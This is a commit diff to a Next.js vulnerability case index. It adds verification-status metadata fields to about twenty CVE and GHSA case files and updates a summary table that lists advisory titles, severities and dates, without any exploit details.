| Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components | `low` | `generated` | `official` | `2026-02-13T00:43:52.836085Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md) | | Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-13T00:43:52.836085Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md) |
| Next.js has Unbounded Memory Consumption via PPR Resume Endpoint | `low` | `generated` | `official` | `2026-02-06T13:13:43.709252Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md) | | Next.js has Unbounded Memory Consumption via PPR Resume Endpoint | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-06T13:13:43.709252Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md) |
| Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration | `low` | `generated` | `official` | `2026-02-10T01:28:46.973023Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md) | | Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-10T01:28:46.973023Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md) |
| Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up | `low` | `generated` | `official` | `2026-02-04T02:46:38.768104Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md) | | Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:46:38.768104Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md) |
| Next Server Actions Source Code Exposure | `low` | `generated` | `official` | `2026-02-04T02:51:40.627151Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md) | | Next Server Actions Source Code Exposure | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:51:40.627151Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md) |
| Next Vulnerable to Denial of Service with Server Components | `low` | `generated` | `official` | `2026-02-04T03:55:54.855562Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md) | | Next Vulnerable to Denial of Service with Server Components | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:55:54.855562Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md) |
| Next.js is vulnerable to RCE in React flight protocol | `low` | `generated` | `official` | `2026-02-04T03:45:15.823345Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md) | | Next.js is vulnerable to RCE in React flight protocol | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:45:15.823345Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md) |
| Next.js Affected by Cache Key Confusion for Image Optimization API Routes | `low` | `generated` | `official` | `2026-02-04T02:50:08.291668Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md) | | Next.js Affected by Cache Key Confusion for Image Optimization API Routes | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:50:08.291668Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md) |
| Next.js Content Injection Vulnerability for Image Optimization | `low` | `generated` | `official` | `2026-02-04T04:35:34.538107Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md) | | Next.js Content Injection Vulnerability for Image Optimization | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:35:34.538107Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md) |
| Next.js Improper Middleware Redirect Handling Leads to SSRF | `low` | `generated` | `official` | `2026-02-04T04:20:45.658010Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md) | | Next.js Improper Middleware Redirect Handling Leads to SSRF | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:20:45.658010Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md) |
| Next.JS vulnerability can lead to DoS via cache poisoning | `low` | `generated` | `official` | `2025-07-03T21:49:52Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md) | | Next.JS vulnerability can lead to DoS via cache poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-07-03T21:49:52Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md) |
| Next.js has a Cache poisoning vulnerability due to omission of the Vary header | `low` | `generated` | `official` | `2026-02-04T02:37:18.974477Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md) | | Next.js has a Cache poisoning vulnerability due to omission of the Vary header | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:37:18.974477Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md) |
| Information exposure in Next.js dev server due to lack of origin verification | `medium` | `generated` | `official` | `2025-06-13T14:41:21Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md) | | Information exposure in Next.js dev server due to lack of origin verification | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-06-13T14:41:21Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md) |
| Next.js Race Condition to Cache Poisoning | `low` | `generated` | `official` | `2025-09-26T17:48:29Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md) | | Next.js Race Condition to Cache Poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-26T17:48:29Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md) |
| Next.js may leak x-middleware-subrequest-id to external hosts | `medium` | `generated` | `official` | `2025-10-13T15:35:50Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md) | | Next.js may leak x-middleware-subrequest-id to external hosts | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-10-13T15:35:50Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md) |
| Authorization Bypass in Next.js Middleware | `low` | `generated` | `official` | `2026-03-04T15:06:29.993197Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md) | | Authorization Bypass in Next.js Middleware | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-04T15:06:29.993197Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md) |
| Next.js Allows a Denial of Service (DoS) with Server Actions | `low` | `generated` | `official` | `2026-02-04T04:36:04.252972Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md) | | Next.js Allows a Denial of Service (DoS) with Server Actions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:36:04.252972Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md) |
| Next.js authorization bypass vulnerability | `low` | `generated` | `official` | `2025-09-10T21:12:24Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md) | | Next.js authorization bypass vulnerability | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-10T21:12:24Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md) |
| Denial of Service condition in Next.js image optimization | `low` | `generated` | `official` | `2026-02-04T03:25:43.295558Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md) | | Denial of Service condition in Next.js image optimization | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:25:43.295558Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md) |
| Next.js Cache Poisoning | `low` | `generated` | `official` | `2026-02-04T03:45:33.402195Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md) | | Next.js Cache Poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:45:33.402195Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md) |
| Next.js Server-Side Request Forgery in Server Actions | `low` | `generated` | `official` | `2026-02-04T03:32:36.434669Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md) | | Next.js Server-Side Request Forgery in Server Actions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:32:36.434669Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md) |
| Unexpected server crash in Next.js. | `low` | `generated` | `official` | `2026-03-13T22:00:36.554552Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md) | | Unexpected server crash in Next.js. | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:36.554552Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md) |
| XSS in Image Optimization API for Next.js | `low` | `generated` | `official` | `2026-03-13T22:00:20.154452Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md) | | XSS in Image Optimization API for Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:20.154452Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md) |
| Open Redirect in Next.js | `low` | `generated` | `official` | `2026-03-13T22:00:08.038285Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md) | | Open Redirect in Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:08.038285Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md) |
| Open Redirect in Next.js versions | `low` | `generated` | `official` | `2026-03-13T22:14:13.665535Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md) | | Open Redirect in Next.js versions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:14:13.665535Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md) |
| Directory Traversal in Next.js | `low` | `generated` | `official` | `2025-09-26T17:49:56Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md) | | Directory Traversal in Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-26T17:49:56Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md) |

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:14:13.665535Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-x56p
# Open Redirect in Next.js versions # Open Redirect in Next.js versions
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2020-15242` - Canonical ID: `nextjs--CVE-2020-15242`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-09-26T17:49:56Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7
# Directory Traversal in Next.js # Directory Traversal in Next.js
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2020-5284` - Canonical ID: `nextjs--CVE-2020-5284`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:00:08.038285Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-vxf5
# Open Redirect in Next.js # Open Redirect in Next.js
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2021-37699` - Canonical ID: `nextjs--CVE-2021-37699`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:00:20.154452Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-9gr3
# XSS in Image Optimization API for Next.js # XSS in Image Optimization API for Next.js
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2021-39178` - Canonical ID: `nextjs--CVE-2021-39178`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:00:36.554552Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -34,6 +38,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-25mp
# Unexpected server crash in Next.js. # Unexpected server crash in Next.js.
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2021-43803` - Canonical ID: `nextjs--CVE-2021-43803`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:32:36.434669Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-fr5h
# Next.js Server-Side Request Forgery in Server Actions # Next.js Server-Side Request Forgery in Server Actions
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2024-34351` - Canonical ID: `nextjs--CVE-2024-34351`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:45:33.402195Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-gp8f
# Next.js Cache Poisoning # Next.js Cache Poisoning
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2024-46982` - Canonical ID: `nextjs--CVE-2024-46982`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:25:43.295558Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-g77x
# Denial of Service condition in Next.js image optimization # Denial of Service condition in Next.js image optimization
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2024-47831` - Canonical ID: `nextjs--CVE-2024-47831`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-09-10T21:12:24Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc
# Next.js authorization bypass vulnerability # Next.js authorization bypass vulnerability
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2024-51479` - Canonical ID: `nextjs--CVE-2024-51479`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:36:04.252972Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -35,6 +39,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-7m27
# Next.js Allows a Denial of Service (DoS) with Server Actions # Next.js Allows a Denial of Service (DoS) with Server Actions
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2024-56332` - Canonical ID: `nextjs--CVE-2024-56332`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-04T15:06:29.993197Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -37,6 +41,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-f82v
# Authorization Bypass in Next.js Middleware # Authorization Bypass in Next.js Middleware
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-29927` - Canonical ID: `nextjs--CVE-2025-29927`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-10-13T15:35:50Z"
severity: "medium" severity: "medium"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -41,6 +45,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-223j
# Next.js may leak x-middleware-subrequest-id to external hosts # Next.js may leak x-middleware-subrequest-id to external hosts
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-30218` - Canonical ID: `nextjs--CVE-2025-30218`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-09-26T17:48:29Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-qpjv
# Next.js Race Condition to Cache Poisoning # Next.js Race Condition to Cache Poisoning
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-32421` - Canonical ID: `nextjs--CVE-2025-32421`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-06-13T14:41:21Z"
severity: "medium" severity: "medium"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-3h52
# Information exposure in Next.js dev server due to lack of origin verification # Information exposure in Next.js dev server due to lack of origin verification
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-48068` - Canonical ID: `nextjs--CVE-2025-48068`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:37:18.974477Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-r2fc
# Next.js has a Cache poisoning vulnerability due to omission of the Vary header # Next.js has a Cache poisoning vulnerability due to omission of the Vary header
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-49005` - Canonical ID: `nextjs--CVE-2025-49005`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-07-03T21:49:52Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-67rr
# Next.JS vulnerability can lead to DoS via cache poisoning # Next.JS vulnerability can lead to DoS via cache poisoning
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-49826` - Canonical ID: `nextjs--CVE-2025-49826`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:35:34.538107Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-xv57
# Next.js Content Injection Vulnerability for Image Optimization # Next.js Content Injection Vulnerability for Image Optimization
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-55173` - Canonical ID: `nextjs--CVE-2025-55173`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:50:08.291668Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg
# Next.js Affected by Cache Key Confusion for Image Optimization API Routes # Next.js Affected by Cache Key Confusion for Image Optimization API Routes
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-57752` - Canonical ID: `nextjs--CVE-2025-57752`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:20:45.658010Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -34,6 +38,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-4342
# Next.js Improper Middleware Redirect Handling Leads to SSRF # Next.js Improper Middleware Redirect Handling Leads to SSRF
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-57822` - Canonical ID: `nextjs--CVE-2025-57822`

13
07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md
